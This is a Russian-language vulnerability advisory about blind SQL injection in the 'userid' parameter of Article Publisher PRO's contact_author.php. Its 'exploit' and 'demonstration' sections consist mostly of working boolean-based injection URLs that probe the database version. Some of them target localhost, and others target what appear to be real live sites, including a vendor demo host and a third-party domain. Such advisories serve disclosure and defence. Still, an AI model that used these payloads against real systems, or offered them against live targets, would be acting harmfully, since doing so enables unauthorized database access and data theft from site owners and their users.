Программа: Article Publisher PRO

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «userid» сценарием contact_author.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://localhost/contact_author.php?userid=1+and+1=1 true

http://localhost/contact_author.php?userid=1+and+1=0 false

http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=1
true

http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=0
false

http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4
true

http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5
false

Демонстрация:

http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4
true

http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5
false

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии